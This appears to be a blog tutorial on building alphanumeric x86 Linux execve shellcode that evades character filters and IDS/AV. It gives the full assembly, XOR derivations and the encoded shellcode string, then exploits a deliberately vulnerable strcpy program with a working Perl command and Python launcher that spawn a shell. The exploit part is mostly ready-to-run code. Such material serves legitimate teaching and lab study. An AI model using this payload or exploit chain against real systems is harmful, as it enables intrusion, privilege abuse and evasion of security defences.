Linux Shellcode - Alphanumeric Execve()
Introduction
Back to shellcode: today we will talk about alphanumeric shellcode. This topic was suggested to me by @nahualito (ty!) some weeks ago, and I have to admit it drove me crazy at times, but it was also a lot of fun. The goal is to build a shellcode made entirely of alphanumeric characters. The reason for this madness is that
there are several filtering schemes out there being employed by programs that only allow alphanumeric characters to be passed into their buffer
and also
(Alphanumeric) shellcodes bypasses many character filters and is somewhat easy to learn due to the fact that many ascii instructions are only one or two byte instructions. The smaller the instructions, the more easily obfuscated and randomized they are. During many buffer overflows the buffer is limited to a very small writeable segment of memory, so many times it is important to utilize the smallest possible combination of opcodes. In other cases, more buffer space is available and things like ascii art shellcode are more plausible.
So we can sum up the “art” of writing alphanumeric shellcode as an extreme form of polymorphism that lets us bypass IDS/IPS/AV agents, and that is, in the end, our goal.
Allowed instructions
The term “alphanumeric” speaks for itself: we want to build a shellcode using only instructions whose opcodes fall in the alphanumeric character range. They are summarized in this table:
hexadecimal opcode | char | instruction |
---|---|---|
30 </r> | ‘0’ | xor <r/m8>, <r8> |
31 </r> | ‘1’ | xor <r/m32>, <r32> |
32 </r> | ‘2’ | xor <r8>, <r/m8> |
33 </r> | ‘3’ | xor <r32>, <r/m32> |
34 <imm8> | ‘4’ | xor al, <imm8> |
35 <imm32> | ‘5’ | xor eax, <imm32> |
36 | ‘6’ | ss: (Segment Override Prefix) |
37 | ‘7’ | aaa |
38 </r> | ‘8’ | cmp <r/m8>, <r8> |
39 </r> | ‘9’ | cmp <r/m32>, <r32> |
41 | ‘A’ | inc ecx |
42 | ‘B’ | inc edx |
43 | ‘C’ | inc ebx |
44 | ‘D’ | inc esp |
45 | ‘E’ | inc ebp |
46 | ‘F’ | inc esi |
47 | ‘G’ | inc edi |
48 | ‘H’ | dec eax |
49 | ‘I’ | dec ecx |
4A | ‘J’ | dec edx |
4B | ‘K’ | dec ebx |
4C | ‘L’ | dec esp |
4D | ‘M’ | dec ebp |
4E | ‘N’ | dec esi |
4F | ‘O’ | dec edi |
50 | ‘P’ | push eax |
51 | ‘Q’ | push ecx |
52 | ‘R’ | push edx |
53 | ‘S’ | push ebx |
54 | ‘T’ | push esp |
55 | ‘U’ | push ebp |
56 | ‘V’ | push esi |
57 | ‘W’ | push edi |
58 | ‘X’ | pop eax |
59 | ‘Y’ | pop ecx |
5A | ‘Z’ | pop edx |
61 | ‘a’ | popa |
62 <…> | ‘b’ | bound <…> |
63 <…> | ‘c’ | arpl <…> |
64 | ‘d’ | fs: (Segment Override Prefix) |
65 | ‘e’ | gs: (Segment Override Prefix) |
66 | ‘f’ | o16: (Operand Size Override) |
67 | ‘g’ | a16: (Address Size Override) |
68 <imm32> | ‘h’ | push <imm32> |
69 <…> | ‘i’ | imul <…> |
6A <imm8> | ‘j’ | push <imm8> |
6B <…> | ‘k’ | imul <…> |
6C <…> | ‘l’ | insb <…> |
6D <…> | ‘m’ | insd <…> |
6E <…> | ‘n’ | outsb <…> |
6F <…> | ‘o’ | outsd <…> |
70 <disp8> | ‘p’ | jo <disp8> |
71 <disp8> | ‘q’ | jno <disp8> |
72 <disp8> | ‘r’ | jb <disp8> |
73 <disp8> | ‘s’ | jae <disp8> |
74 <disp8> | ‘t’ | je <disp8> |
75 <disp8> | ‘u’ | jne <disp8> |
76 <disp8> | ‘v’ | jbe <disp8> |
77 <disp8> | ‘w’ | ja <disp8> |
78 <disp8> | ‘x’ | js <disp8> |
79 <disp8> | ‘y’ | jns <disp8> |
7A <disp8> | ‘z’ | jp <disp8> |
What can we directly deduce from all this?
- No “mov” instructions: we need to find another way to move our data around.
- No interesting arithmetic instructions (“add”, “sub”, …): we can only use DEC and INC, and we can’t use INC with the EAX register (its opcode, 0x40, is ‘@’).
- The “xor” instruction: we can XOR bytes and doublewords, which is very interesting for basic crypto stuff.
- “PUSH”/“POP”/“POPAD” instructions: we can push bytes and doublewords directly onto the stack, but we can only POP into the EAX, ECX and EDX registers. It seems we’re going to play with the stack again.
- The “o16” operand size override: we can also perform 16-bit manipulations with this instruction prefix.
- Conditional jumps and “cmp” instructions: we can do some comparisons, but there is no unconditional “jmp”, and we can’t directly use constant values with CMP.
Not so much, eh?! And obviously don’t forget that the operands of these instructions (/r, imm8, imm32, disp8 and disp32) must also remain alphanumeric, which makes our task even more complicated…
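To make the operand constraint concrete, here is a minimal Python sketch that checks whether an encoded instruction sequence stays inside the alphanumeric range. The helper name `is_alphanumeric` is my own assumption for illustration; the byte strings are the standard x86 encodings of the instructions named in the comments.

```python
import string

# Bytes allowed in an alphanumeric shellcode: '0'-'9', 'A'-'Z', 'a'-'z'.
ALLOWED = set((string.digits + string.ascii_letters).encode("ascii"))


def is_alphanumeric(code: bytes) -> bool:
    """Return True if every byte of `code` is an ASCII letter or digit."""
    return all(b in ALLOWED for b in code)


# push 0x30 ; pop eax ; xor al, 0x30  ->  6A 30 58 34 30 ("j0X40")
print(is_alphanumeric(b"\x6a\x30\x58\x34\x30"))  # True
# mov al, 0xb ; int 0x80  ->  B0 0B CD 80
print(is_alphanumeric(b"\xb0\x0b\xcd\x80"))      # False
```

The check covers opcodes and operands alike, which is exactly why an immediate such as 0x0b can never appear directly in the shellcode.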
First alphanumeric instructions
Don’t panic: with a little creativity we can still get a shellcode. The basic idea is to store everything we need on the stack and finally use the POPAD instruction to load the right values into the right registers.
For the sake of simplicity we’ll take the simplest Linux shellcode to manipulate, the execve() shellcode.
Our shellcode should do the same job as this one:
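cdq ; zero edx (sign-extends eax, so eax must be non-negative)
mul edx ; zero eax (edx:eax = eax * edx = 0)
lea ecx, [eax] ; zero ecx
mov esi, 0x68732f2f ; "//sh"
mov edi, 0x6e69622f ; "/bin"
push ecx ; push the NULL terminator
push esi ; push "//sh" (hs// in little-endian order)
push edi ; push "/bin" (nib/ in little-endian order)
lea ebx, [esp] ; ebx points to "/bin//sh"
mov al, 0xb ; execve syscall number in eax
int 0x80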
The first three instructions zero our registers, but as we saw we can’t use them directly. We can, however, do the same job in a polymorphic way with PUSH, POP and XOR, going through the stack:
push 0x30 ; push 0x30 on the stack
pop eax ; place 0x30 in EAX
xor al, 0x30 ; xor AL with 0x30 to obtain 0 in EAX
push eax ; put 0 on the stack
pop edx ; and pop it into EDX, which is now 0 too
Nice. Now we have to put on the stack the /bin//sh string whose address will be loaded into the EBX register. For this purpose we start from four alphanumeric characters like XXsh and use XOR to transform them into //sh.
A review of XOR logic is useful here:
- 1 XOR 1 = 0
- 0 XOR 0 = 0
- 1 XOR 0 = 1
- 0 XOR 1 = 1
So, doing some binary calculations, we find that XXsh in binary is 01011000 01011000 01110011 01101000 and that the //sh we need is 00101111 00101111 01110011 01101000. What we need is the value to XOR with XXsh to obtain //sh:
   X        X        s        h
01011000 01011000 01110011 01101000
xor
01110111 01110111 00000000 00000000 <------
-----------------------------------
00101111 00101111 01110011 01101000
   /        /        s        h
The mask for the two leading bytes is 01110111 01110111, or the equivalent hex 77 77, or the equivalent chars ww; the sh part is XORed with zero and stays untouched. So we now prepare the asm code:
push 0x68735858 ; push XXsh
pop eax ; put XXsh in EAX
xor ax, 0x7777 ; xor the low word with ww
push eax ; put //sh on the stack
push 0x30 ; zero EAX again
pop eax
xor al, 0x30
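The mask derivation above can be double-checked with a few lines of Python. This is only a sketch of the arithmetic, not part of the shellcode; the variable names are my own.

```python
import struct

start = b"XXsh"   # alphanumeric placeholder pushed with `push 0x68735858`
target = b"//sh"  # what execve() needs on the stack

# XOR is its own inverse, so mask = start XOR target, byte by byte.
mask = bytes(s ^ t for s, t in zip(start, target))
print(mask.hex())  # 77770000: only the first two bytes change

# x86 is little-endian: the first two bytes in memory are the low word (AX).
eax = struct.unpack("<I", start)[0]      # 0x68735858
eax ^= struct.unpack("<H", mask[:2])[0]  # xor ax, 0x7777
print(hex(eax), struct.pack("<I", eax))  # 0x68732f2f b'//sh'
```

The same recipe works for any placeholder, as long as both the placeholder and the resulting mask bytes stay alphanumeric.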
Now we can do a simpler job for /bin: load 0bin into EAX, decrement it by 1 and push it on the stack after //sh.
xor eax, 0x6e696230 ; EAX was 0, so it now holds 0bin
dec eax ; '0' (0x30) becomes '/' (0x2f): /bin
push eax ; put /bin on the stack
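A quick Python check of this step, assuming EAX is zero on entry as arranged by the previous instructions:

```python
import struct

eax = 0                        # EAX was zeroed by push/pop/xor
eax ^= 0x6E696230              # xor eax, 0x6e696230
before = struct.pack("<I", eax)
eax = (eax - 1) & 0xFFFFFFFF   # dec eax, wrapped to 32 bits
after = struct.pack("<I", eax)
print(before, after)           # b'0bin' b'/bin'
```

Only the lowest byte changes because 0x30 does not underflow when decremented.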
Now we have the basic elements for the execve; it’s time to load everything into the registers using PUSHAD/POPAD. PUSHAD isn’t in the table but POPAD is, so we need to emulate a PUSHAD and then execute a POPAD. PUSHAD pushes the registers onto the stack in this order: EAX, ECX, EDX, EBX, ESP, EBP, ESI and EDI. Our PUSHAD is a little bit different: EDX, ECX, EBX, EAX, ESP, EBP, ESI, EDI. This way, when we execute POPAD, everything lands in the right place.
PUSHAD instruction | Personalized PUSHAD instruction |
---|---|
PUSH EAX | PUSH EDX (0x0) |
PUSH ECX | PUSH ECX |
PUSH EDX | PUSH EBX |
PUSH EBX | PUSH EAX (%esp) |
PUSH ESP | PUSH ESP |
PUSH EBP | PUSH EBP |
PUSH ESI | PUSH ESI |
PUSH EDI | PUSH EDI |
So let’s prepare the code:
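; pushad/popad to place /bin//sh in EBX register
push esp
pop eax ; EAX = ESP, the address of /bin//sh
push edx ; custom PUSHAD starts here (EDX = 0)
push ecx
push ebx
push eax
push esp
push ebp
push esi
push edi
popad ; EAX = 0, EBX = address of /bin//sh
push eax
pop ecx ; ECX = 0
push ebx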
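To see where each value lands, here is a small Python model of the custom push sequence followed by POPAD. It is a sketch only: the string placeholders are hypothetical stand-ins for whatever the registers hold at that point, and the pop order is the documented POPAD behaviour (EDI, ESI, EBP, skip ESP, EBX, EDX, ECX, EAX).

```python
# Register state before the custom push sequence (placeholders are assumptions).
regs = {
    "eax": "ptr_to_/bin//sh",  # set by `push esp ; pop eax`
    "ecx": "old_ecx",
    "edx": 0,                  # zeroed earlier
    "ebx": "old_ebx",
    "esp": "old_esp",
    "ebp": "old_ebp",
    "esi": "old_esi",
    "edi": "old_edi",
}

stack = []
# Custom "PUSHAD" order used in the text.
for name in ["edx", "ecx", "ebx", "eax", "esp", "ebp", "esi", "edi"]:
    stack.append(regs[name])

# POPAD pops in this fixed order; the saved ESP slot is discarded.
after = dict(regs)
for name in ["edi", "esi", "ebp", None, "ebx", "edx", "ecx", "eax"]:
    value = stack.pop()
    if name is not None:
        after[name] = value

for name in ("eax", "ebx", "ecx", "edx"):
    print(name, "=", after[name])
```

In this model EAX ends up 0 and EBX holds the string pointer, while ECX is unchanged (hence the following `push eax ; pop ecx`) and EDX receives whatever EBX contained before the sequence.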
The other thing we need is the value 0xb in the EAX register. For that purpose we can find one or more values to XOR with 0 to obtain 0xb. Doing the same work as for XXsh, we find that 0x4a followed by 0x41 does the job:
xor al, 0x4a
xor al, 0x41
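Instead of working the bits by hand, the pair can also be found by brute force. The following Python sketch (the function name `xor_pairs` is my own) lists every pair of alphanumeric bytes whose XOR gives a target value:

```python
import string

ALNUM = sorted((string.digits + string.ascii_letters).encode("ascii"))


def xor_pairs(target: int):
    """Return all (a, b) with a <= b, both alphanumeric, and a ^ b == target."""
    return [(a, b) for a in ALNUM for b in ALNUM if a <= b and a ^ b == target]


pairs = xor_pairs(0x0B)       # 0x0b is the execve syscall number on i386
print((0x41, 0x4A) in pairs)  # True: the 'A'/'J' pair used in the text
print([chr(a) + chr(b) for a, b in pairs][:5])
```

Any pair from the list would work; the order of the two XOR instructions does not matter either.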
Now the last and most tedious thing remains: the int 0x80 instruction that triggers the syscall. We can’t use the int instruction, so we need to invent another trick.
int 0x80 has the opcode 0xcd 0x80, so we can store the opcode on the stack and jump to that location to trigger the syscall. To do that we can use some binary math and another technique:
- starting from EAX xored to 0
- decrement EAX by 1 to obtain 0xffffffff
- xor AX with 0x4f73
- xor AX with 0x3041
- obtain 0xffff80cd
- push EAX on the stack
11111111 11111111 - Begin (low word of EAX, bytes in memory order)
01110011 01001111 - XOR #1 (0x4f73)
10001100 10110000 - Result of XOR #1
01000001 00110000 - XOR #2 (0x3041)
11001101 10000000 - Result of XOR #2 (0xcd 0x80)
dec eax ; 0xffffffff in EAX
xor ax, 0x4f73 ;
xor ax, 0x3041 ; 0xffff80cd in EAX
push eax ; put it on the stack
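The same computation in Python, as a sanity check of the constants. Since both XOR constants fit in 16 bits, XORing the full 32-bit value behaves like `xor ax, imm16`.

```python
import struct

eax = 0
eax = (eax - 1) & 0xFFFFFFFF  # dec eax        -> 0xffffffff
eax ^= 0x4F73                 # xor ax, 0x4f73 -> 0xffffb08c
eax ^= 0x3041                 # xor ax, 0x3041 -> 0xffff80cd
print(hex(eax))               # 0xffff80cd

# Little-endian layout of the pushed dword: the first two bytes are CD 80.
pushed = struct.pack("<I", eax)
print(pushed.hex())           # cd80ffff
```

The two trailing ff bytes are never executed, because execve() does not return when it succeeds.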
The last problem to solve is that 0xffff80cd must be executed as the last instruction. Since the stack grows toward lower addresses, everything we push later ends up on top of it, so we need to push this value first. The complete shellcode therefore starts with the int 0x80 block.
The Shellcode
global _start
section .text
_start:
; int 0x80 ------------
push 0x30
pop eax
xor al, 0x30
push eax
pop edx
dec eax
xor ax, 0x4f73
xor ax, 0x3041
push eax
push edx
pop eax
;----------------------
push edx
push 0x30 ; EAX = 0 again (redundant, but present in the encoded string)
pop eax
xor al, 0x30
push 0x68735858
pop eax
xor ax, 0x7777
push eax
push 0x30
pop eax
xor al, 0x30
xor eax, 0x6e696230
dec eax
push eax
; pushad/popad to place /bin/sh in EBX register
push esp
pop eax
push edx
push ecx
push ebx
push eax
push esp
push ebp
push esi
push edi
popad
push eax
pop ecx
push ebx
xor al, 0x4a
xor al, 0x41
For convenience we can convert the assembled shellcode to ASCII text:
j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A
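To check the string against the assembly, it can be decoded back into mnemonics. Below is a minimal, table-driven Python sketch that understands only the handful of opcodes used here; it is not a general x86 disassembler, and the function name `disassemble` is my own.

```python
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
# One-byte register opcodes: base opcode -> mnemonic (register = low 3 bits).
REG_OPS = {0x40: "inc", 0x48: "dec", 0x50: "push", 0x58: "pop"}
# Opcodes followed by an immediate: opcode -> (mnemonic, immediate size).
IMM_OPS = {0x34: ("xor al,", 1), 0x35: ("xor eax,", 4),
           0x68: ("push", 4), 0x6A: ("push", 1)}


def disassemble(code: bytes) -> list:
    """Decode the small opcode subset used by this shellcode."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if op == 0x66 and code[i + 1:i + 2] == b"\x35":
            # Operand-size prefix turns `xor eax, imm32` into `xor ax, imm16`.
            imm = int.from_bytes(code[i + 2:i + 4], "little")
            out.append(f"xor ax, {imm:#x}")
            i += 4
        elif op in IMM_OPS:
            name, size = IMM_OPS[op]
            imm = int.from_bytes(code[i + 1:i + 1 + size], "little")
            out.append(f"{name} {imm:#x}")
            i += 1 + size
        elif op == 0x61:
            out.append("popad")
            i += 1
        elif (op & 0xF8) in REG_OPS:
            out.append(f"{REG_OPS[op & 0xF8]} {REGS[op & 7]}")
            i += 1
        else:
            raise ValueError(f"opcode {op:#x} at offset {i} is outside the subset")
    return out


shellcode = b"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A"
print(len(shellcode))
for line in disassemble(shellcode):
    print(line)
```

The string is 66 bytes long, the figure used later when sizing the payload.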
Now we need a simple buffer overflow that lets us load and execute the shellcode. Let’s use a simple C program (bof.c):
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]){
char buffer[128];
strcpy(buffer, argv[1]);
return 0;
}
When you test it on recent kernels, remember to disable ASLR (randomize_va_space) and to compile the C program with an executable stack and the stack protector disabled. The shellcode is 32-bit, so on a 64-bit host gcc would also need -m32.
bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sysctl -p
gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g bof.c -o bof
Next, testing the bof program, we found that the EIP overwrite happens with 136 bytes of input, so with a little math we get:
136 - 66 (shellcode) - 4 (EIP address overwrite) = 66 bytes
so we can pass 66 NOP bytes + 66 shellcode bytes + 4 bytes for the EIP redirection address. Using Peda we first have to find the address to land on.
In this case we can choose an address at the end of the NOP zone, just before our shellcode: 0xbffff788. Now we can observe what happens on the stack when we use this address:
[------------------------------------stack-------------------------------------]
0000| 0xbffff52c --> 0xbffff530 ("/bin//sh")
0004| 0xbffff530 ("/bin//sh")
0008| 0xbffff534 ("//sh")
0012| 0xbffff538 --> 0x0
0016| 0xbffff53c --> 0xffff80cd
0020| 0xbffff540 --> 0x0
0024| 0xbffff544 --> 0xbffff5d4 --> 0xbffff728 ("/home/bolo/alphanumeric/bof")
0028| 0xbffff548 --> 0xbffff5e0 --> 0xbffff7d4 ("LC_PAPER=it_IT.UTF-8")
[------------------------------------------------------------------------------]
As we can see, our shellcode runs perfectly up to the point where it has to execute the 0xffff80cd (int 0x80) instruction. We can also see that this value sits 16 bytes down the stack, so we can INC ESP 16 times to bring 0xffff80cd to the top of the stack. INC ESP is in our table of instructions and has opcode 0x44, or “D”.
Last thing: execute the bytes of 0xffff80cd with a JMP ESP instruction. I know it is not in the table of our approved instructions, and that’s the last trick: the JMP ESP opcode is \xff\xe4, and we can put this opcode just before the return address and not inside the shellcode.
So our final command is:
./bof `perl -e 'print "\x90"x48 . "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" . "D"x16 . "\xff\xe4\x79\xf7\xff\xbf"'`
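The layout of that argument is easier to verify when written down as a table of sizes. This Python sketch only does the bookkeeping (the labels are mine) and confirms that the parts add up to the 136 bytes found earlier:

```python
# (label, size in bytes) for each part of the final argument, in order.
layout = [
    ("NOP sled", 48),
    ("alphanumeric shellcode", 66),
    ("inc esp x16 ('D')", 16),
    ("jmp esp (ff e4)", 2),
    ("return address", 4),
]

offset = 0
for label, size in layout:
    print(f"{offset:3d}..{offset + size - 1:3d}  {label}")
    offset += size

print("total:", offset)  # total: 136
```

Compared with the first attempt, 18 bytes of the NOP sled were traded for the sixteen INC ESP instructions and the two-byte JMP ESP.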
Putting it all together in a Python script and executing it:
#!/usr/bin/env python3
import subprocess
print("[*] Loading NOP")
z = b"\x90" * 48
print("[*] Loading alphanumeric")
z += b"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A"
print("[*] Loading syscall")
z += b"D" * 16
print("[*] Loading JMP and landing address")
z += b"\xff\xe4\x79\xf7\xff\xbf"
print("[*] Popping the shell...")
# Pass the raw bytes as argv[1]; a text string would be re-encoded as UTF-8.
subprocess.call([b"./bof", z])